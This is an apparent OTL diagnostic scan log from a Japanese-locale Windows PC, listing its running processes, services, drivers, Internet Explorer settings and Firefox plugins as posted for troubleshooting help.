PRC - [2015/09/06 10:28:08 | 000,840,080 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
PRC - [2015/07/24 20:36:40 | 000,069,448 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
PRC - [2015/07/07 20:12:28 | 000,082,128 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2015/05/01 11:17:04 | 001,772,672 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2015/05/01 11:16:10 | 001,394,816 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2015/02/04 23:44:22 | 000,076,152 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrA.exe
PRC - [2012/03/27 21:17:04 | 000,988,456 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
PRC - [2012/03/23 18:33:48 | 000,419,408 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LMutilps32.exe
PRC - [2012/03/23 18:33:46 | 000,355,920 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\dsiwmis.exe
PRC - [2012/03/23 18:33:46 | 000,343,632 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LMworker.exe
PRC - [2012/03/23 18:33:44 | 001,105,488 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LManager.exe
PRC - [2012/02/29 22:49:06 | 000,028,264 | ---- | M] (Acer Incorporated) -- C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
PRC - [2012/02/08 11:03:36 | 000,363,800 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012/02/08 11:03:34 | 000,277,784 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012/02/08 11:03:16 | 000,161,560 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
PRC - [2012/02/06 17:54:04 | 000,255,376 | ---- | M] (Acer Incorporated) -- C:\Program Files\Acer\Acer Updater\UpdaterService.exe
PRC - [2012/02/01 16:29:58 | 000,013,592 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2012/01/05 14:22:10 | 000,256,536 | ---- | M] (NTI Corporation) -- C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
PRC - [2012/01/05 14:21:44 | 000,296,984 | ---- | M] (NTI Corporation) -- C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2015/01/20 22:35:44 | 001,044,776 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/02/12 20:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2012/01/05 14:22:36 | 000,465,344 | ---- | M] () -- C:\Program Files (x86)\NTI\Acer Backup Manager\sqlite3.dll
MOD - [2011/06/09 18:31:54 | 000,026,736 | ---- | M] () -- C:\Program Files (x86)\Janetter2\bin\SendWheel.dll


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/06/02 17:35:47 | 011,086,056 | ---- | M] (DisplayLink Corp.) [Auto | Running] -- C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe -- (DisplayLinkService)
SRV:[b]64bit:[/b] - [2015/05/26 03:19:13 | 001,255,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\diagtrack.dll -- (DiagTrack)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,366,544 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,023,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2014/01/27 08:37:08 | 000,185,792 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Windows\SysNative\mfevtps.exe -- (mfevtp)
SRV:[b]64bit:[/b] - [2014/01/27 08:31:12 | 000,219,752 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe -- (mfefire)
SRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 000,048,128 | ---- | M] (Broadcom Corporation) [Auto | Running] -- C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE -- (wltrysvc)
SRV:[b]64bit:[/b] - [2012/02/22 13:21:16 | 000,199,272 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe -- (McShield)
SRV:[b]64bit:[/b] - [2012/02/06 17:54:04 | 000,255,376 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files\Acer\Acer Updater\UpdaterService.exe -- (Live Updater Service)
SRV:[b]64bit:[/b] - [2012/02/02 22:29:52 | 000,628,448 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV:[b]64bit:[/b] - [2012/01/20 16:15:14 | 000,149,504 | ---- | M] (Intel(R) Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\TurboBoost\TurboBoost.exe -- (TurboBoost)
SRV:[b]64bit:[/b] - [2010/09/22 18:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV - [2015/09/06 10:28:08 | 000,840,080 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2015/08/26 21:46:30 | 000,149,160 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/08/12 03:06:17 | 000,269,000 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/08/03 12:47:10 | 002,545,512 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2015/08/03 12:13:12 | 000,417,552 | ---- | M] (LogMeIn, Inc.) [Auto | Running] -- C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe -- (LMIGuardianSvc)
SRV - [2015/07/24 20:36:40 | 000,069,448 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe -- (chromoting)
SRV - [2015/07/24 08:23:38 | 000,838,336 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2015/07/09 13:14:04 | 000,327,296 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2015/07/07 20:12:28 | 000,082,128 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2015/05/01 11:17:04 | 001,772,672 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2015/05/01 11:16:10 | 001,394,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2015/02/04 23:44:22 | 000,076,152 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrA.exe -- (PnkBstrA)
SRV - [2015/01/29 05:13:13 | 001,910,128 | ---- | M] (Electronic Arts) [On_Demand | Stopped] -- C:\Program Files (x86)\Origin\OriginClientService.exe -- (Origin Client Service)
SRV - [2014/04/11 23:08:08 | 000,103,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2014/03/21 07:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/08/08 10:00:02 | 000,655,624 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2012/04/23 13:25:32 | 000,276,248 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2012/03/23 18:33:46 | 000,355,920 | ---- | M] (Dritek System Inc.) [Auto | Running] -- C:\Program Files (x86)\Launch Manager\dsiwmis.exe -- (DsiWMIService)
SRV - [2012/02/29 22:49:06 | 000,028,264 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files (x86)\Acer\Registration\GREGsvc.exe -- (GREGService)
SRV - [2012/02/08 11:03:36 | 000,363,800 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/02/08 11:03:34 | 000,277,784 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/02/08 11:03:16 | 000,161,560 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2012/02/01 16:29:58 | 000,013,592 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2012/01/05 14:22:10 | 000,256,536 | ---- | M] (NTI Corporation) [Auto | Running] -- C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe -- (NTI IScheduleSvc)
SRV - [2011/06/21 12:55:04 | 000,173,424 | ---- | M] (Egis Technology Inc. ) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe -- (EgisTec Ticket Service)
SRV - [2010/06/01 15:31:28 | 002,804,568 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe -- (NOBU)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/06/16 20:38:51 | 000,030,264 | ---- | M] (Disc Soft Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dtlitescsibus.sys -- (dtlitescsibus)
DRV:[b]64bit:[/b] - [2015/06/02 17:38:27 | 000,441,064 | ---- | M] (DisplayLink Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dlkmd.sys -- (dlkmd)
DRV:[b]64bit:[/b] - [2015/06/02 17:38:27 | 000,018,664 | ---- | M] (DisplayLink Corp.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\dlkmdldr.sys -- (dlkmdldr)
DRV:[b]64bit:[/b] - [2015/03/04 19:34:52 | 000,124,568 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2014/01/27 08:43:26 | 000,070,592 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\cfwids.sys -- (cfwids)
DRV:[b]64bit:[/b] - [2014/01/27 08:37:32 | 000,344,688 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfewfpk.sys -- (mfewfpk)
DRV:[b]64bit:[/b] - [2014/01/27 08:33:26 | 000,783,864 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfehidk.sys -- (mfehidk)
DRV:[b]64bit:[/b] - [2014/01/27 08:31:34 | 000,520,696 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfefirek.sys -- (mfefirek)
DRV:[b]64bit:[/b] - [2014/01/27 08:30:06 | 000,311,600 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeavfk.sys -- (mfeavfk)
DRV:[b]64bit:[/b] - [2014/01/27 08:29:22 | 000,180,272 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mfeapfk.sys -- (mfeapfk)
DRV:[b]64bit:[/b] - [2013/10/15 17:50:00 | 000,169,720 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mkd3kfnt.sys -- (Mkd3kfNt)
DRV:[b]64bit:[/b] - [2013/10/02 11:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 004,746,304 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BCMWL664.SYS -- (BCM43XX)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 000,022,592 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bcm42rly.sys -- (BCM42RLY)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:13 | 000,021,568 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bcmvwl64.sys -- (BcmVWL)
DRV:[b]64bit:[/b] - [2013/05/31 09:17:00 | 000,112,888 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2Nadr.sys -- (Mkd2Nadr)
DRV:[b]64bit:[/b] - [2013/05/31 01:16:40 | 000,064,280 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGSHidFilt.Sys -- (LGSHidFilt)
DRV:[b]64bit:[/b] - [2012/11/13 16:49:00 | 000,098,104 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2BthF.sys -- (Mkd2Bthf)
DRV:[b]64bit:[/b] - [2012/08/23 23:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2012/08/23 23:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/07/17 18:12:08 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,062,776 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDVDisk.sys -- (mwlPSDVDisk)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,022,648 | ---- | M] (Egis Technology Inc.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDFilter.sys -- (mwlPSDFilter)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,020,520 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDNserv.sys -- (mwlPSDNServ)
DRV:[b]64bit:[/b] - [2012/06/01 17:35:58 | 000,083,576 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bScsiSDa.sys -- (bScsiSDa)
DRV:[b]64bit:[/b] - [2012/03/27 11:09:54 | 014,748,416 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2012/03/07 22:48:20 | 000,238,384 | ---- | M] (ELAN Microelectronics Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ETD.sys -- (ETD)
DRV:[b]64bit:[/b] - [2012/03/01 15:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2012/02/22 12:29:46 | 000,100,912 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mferkdet.sys -- (mferkdet)
DRV:[b]64bit:[/b] - [2012/02/07 15:03:06 | 000,018,432 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NTIDrvr.sys -- (NTIDrvr)
DRV:[b]64bit:[/b] - [2012/02/07 15:03:06 | 000,017,408 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UBHelper.sys -- (UBHelper)
DRV:[b]64bit:[/b] - [2012/02/01 16:16:40 | 000,568,600 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:[b]64bit:[/b] - [2012/01/20 16:14:34 | 000,016,128 | ---- | M] (Intel(R) Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\TurboB.sys -- (TurboB)
DRV:[b]64bit:[/b] - [2012/01/19 00:30:42 | 000,435,240 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\k57nd60a.sys -- (k57nd60a)
DRV:[b]64bit:[/b] - [2011/12/06 20:23:08 | 000,331,264 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2011/11/04 10:21:38 | 000,019,496 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57xdmp.sys -- (b57xdmp)
DRV:[b]64bit:[/b] - [2011/11/04 10:21:36 | 000,068,648 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57xdbd.sys -- (b57xdbd)
DRV:[b]64bit:[/b] - [2011/09/02 14:36:58 | 000,051,752 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bScsiMSa.sys -- (bScsiMSa)
DRV:[b]64bit:[/b] - [2011/07/14 16:32:23 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2011/07/14 16:32:23 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2009/11/24 09:38:00 | 000,016,008 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGVirHid.sys -- (LGVirHid)
DRV:[b]64bit:[/b] - [2009/11/24 09:37:50 | 000,022,408 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGBusEnum.sys -- (LGBusEnum)
DRV:[b]64bit:[/b] - [2009/07/14 10:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2009/07/14 10:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2009/07/14 10:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:[b]64bit:[/b] - [2009/06/11 05:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:[b]64bit:[/b] - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2009/07/14 10:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/ja-jp/?ocid=iehp
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = ja-JP
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes,DefaultScope = {C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:40.0.3
FF - user.js - File not found

FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.6.2: C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll (EA Digital Illusions CE AB)
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.4.0: C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.6.2: C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.60.2: C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.60.2: C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
